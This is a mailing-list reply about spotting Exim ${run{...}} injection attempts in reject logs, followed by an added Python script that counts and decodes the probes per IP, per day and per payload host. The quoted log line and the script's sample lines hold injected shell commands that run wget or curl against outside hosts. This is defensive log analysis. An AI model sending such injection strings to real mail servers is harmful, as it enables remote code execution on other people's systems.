Hi.

On Fri, Jun 21, 2019 at 06:36:20AM +1000, Andrew McGlashan wrote:
> On 21/6/19 5:52 am, Reco wrote:
> > Plain old grep is more than enough here. This one:
> > 
> > grep 'run{' /var/log/exim4/reject*
> > 
> > finds things like these:
> > 
> > 2019-06-19 18:54:43 H=(service.com) [107.182.225.42]
> > F=<supp...@service.com> rejected RCPT
> > <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.xxx.xxx.xxx\x22}}@localhost>:
> > Unrouteable address
> 
> Okay:
>  21 attempts from 8 different IP addresses on one server
>      1        [163.172.157.143]
>      2        [188.138.0.205]
>      3        [23.129.64.152]
>      4        [23.129.64.193]
>      5        [27.69.172.214]
>      6        [45.55.94.254]
>      7        [51.15.227.108]
>      8        [89.248.171.57]
> 
>  28 attempts on another server
>      1        [149.56.142.192]
>      2        [163.172.157.143]
>      3        [188.138.0.205]
>      4        [27.69.172.229]
>      5        [51.15.227.108]
>      6        [51.77.148.55]
>      7        [85.58.114.228]
>      8        [89.248.171.57]
> 
>  17 attempts on another server
>      1        [188.138.0.205]
>      2        [89.248.171.57]
>      3        [98.158.184.125]
> 
> 
> 13 unique IP addresses so far.... (dig -x output)
> 
>      1        149.56.142.192   192.ip-149-56-142.net.
>      2        163.172.157.143  143-157-172-163.rev.cloud.scaleway.com.
>      3        188.138.0.205    static-ip-188-138-0-205.inaddr.ip-pool.com.
>      4        23.129.64.152
>      5        23.129.64.193
>      6        27.69.172.214    localhost.
>      7        27.69.172.229    localhost.
>      8        45.55.94.254
>      9        51.15.227.108    108-227-15-51.rev.cloud.scaleway.com.
>     10        51.77.148.55     55.ip-51-77-148.eu.
>     11        85.58.114.228    228.pool85-58-114.dynamic.orange.es.
>     12        89.248.171.57    scanner20.openportstats.com.
>     13        98.158.184.125   206.217.215.125.static.midphase.com.

What I'm most interested in here is the time distribution.
I.e. has the number of exploitation attempts lowered after the Exim
banner change? Stayed the same?

Reco
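To get the time distribution the question above asks for, here is an added Python example (not code from the thread, not Reco's or Andrew's). It parses reject-log lines of the form quoted above, matches the same literal `${run{` that the grep does, decodes Exim's `\xHH` and `\t` escapes so the injected command is readable, and counts attempts per source IP, per day, and before/after a cutoff such as the time of the banner change. The log lines, IPs (documentation ranges), timestamps and the cutoff are constructed for the example and are not real data.

```python
"""Count ${run{...}} RCPT probes in Exim reject logs (added example, not from the thread)."""
import gzip
import re
import sys
from collections import Counter
from datetime import datetime

# Constructed sample in the format quoted in the thread. Not real log data:
# the IPs are from documentation ranges and the timestamps are made up.
SAMPLE_REJECT_LOG = r"""
2019-06-19 18:54:43 H=(service.com) [192.0.2.10] F=<sender@example.net> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20203.0.113.5\x2ftmp\x2fx\x22}}@localhost>: Unrouteable address
2019-06-19 23:10:02 H=(mx.example) [192.0.2.11] F=<a@b.example> rejected RCPT <nobody@example.org>: Unrouteable address
2019-06-20 03:22:17 H=(foo) [192.0.2.12] F=<x@y.example> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20203.0.113.6\x22}}@localhost>: Unrouteable address
2019-06-20 09:01:44 H=(bar) [192.0.2.10] F=<x@y.example> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20203.0.113.5\x2fp\x22}}@localhost>: Unrouteable address
2019-06-21 11:40:09 H=(baz) [192.0.2.13] F=<x@y.example> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20203.0.113.5\x2fq\x22}}@localhost>: Unrouteable address
"""

TS_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) ")
IP_RE = re.compile(r"\[([0-9a-fA-F.:]+)\]")           # first bracketed address: the client IP
RCPT_RE = re.compile(r"rejected RCPT <([^>]*)>")
RUN_RE = re.compile(r"\$\{run\{(.*)\}\}")              # same literal match as grep 'run{'
ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\\([tnr\\])")


def decode_exim_escapes(s):
    """Undo the \\xHH and \\t escapes that Exim's string expansion would decode,
    so the injected command reads the way the shell would see it."""
    simple = {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}
    return ESC_RE.sub(lambda m: chr(int(m.group(1), 16)) if m.group(1) else simple[m.group(2)], s)


def parse_attempt(line):
    """Return (timestamp, source_ip, decoded_command) if the line is a rejected RCPT
    whose local part carries a ${run{...}} expansion, else None."""
    ts, ip, rcpt = TS_RE.match(line), IP_RE.search(line), RCPT_RE.search(line)
    if not (ts and ip and rcpt):
        return None
    run = RUN_RE.search(rcpt.group(1))
    if not run:
        return None
    when = datetime.strptime(ts.group(1), "%Y-%m-%d %H:%M:%S")
    return when, ip.group(1), decode_exim_escapes(run.group(1))


def attempts(log_text):
    return [a for a in map(parse_attempt, log_text.splitlines()) if a]


def per_ip(att):
    return Counter(ip for _, ip, _ in att)


def per_day(att):
    return Counter(when.date().isoformat() for when, _, _ in att)


def before_after(att, cutoff):
    """Attempts strictly before the cutoff vs. at/after it. cutoff is a datetime
    or a 'YYYY-MM-DD HH:MM:SS' string (e.g. when the banner was changed)."""
    if isinstance(cutoff, str):
        cutoff = datetime.strptime(cutoff, "%Y-%m-%d %H:%M:%S")
    before = sum(1 for when, _, _ in att if when < cutoff)
    return before, len(att) - before


def fetch_hosts(att):
    """Hosts the decoded commands download their payload from (wget/curl argument)."""
    hosts = Counter()
    for _, _, cmd in att:
        m = re.search(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(?:https?://)?([0-9A-Za-z.\-]+)", cmd)
        if m:
            hosts[m.group(1)] += 1
    return hosts


def read_logs(paths):
    """Read plain and gzip-rotated reject logs as text."""
    chunks = []
    for p in paths:
        opener = gzip.open if p.endswith(".gz") else open
        with opener(p, "rt", errors="replace") as f:
            chunks.append(f.read())
    return "\n".join(chunks)


if __name__ == "__main__":
    # Usage: python3 exim_run_probes.py /var/log/exim4/reject*   (no args: the constructed sample)
    text = read_logs(sys.argv[1:]) if len(sys.argv) > 1 else SAMPLE_REJECT_LOG
    att = attempts(text)
    print(len(att), "attempts from", len(per_ip(att)), "source IPs")
    for ip, n in per_ip(att).most_common():
        print(f"{n:5d}  [{ip}]")
    for day, n in sorted(per_day(att).items()):
        print(f"{day}  {n}")
    cutoff = "2019-06-20 00:00:00"  # assumption: replace with the time of your banner change
    print("before/after", cutoff, before_after(att, cutoff))
    for host, n in fetch_hosts(att).most_common():
        print(f"{n:5d}  payload host {host}")
```

Run it against the real reject logs (rotated `.gz` files included) and pass the banner-change time as the cutoff; the per-day counter is the direct answer to whether the rate dropped, and the per-IP and payload-host counters give the lists Andrew built by hand.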
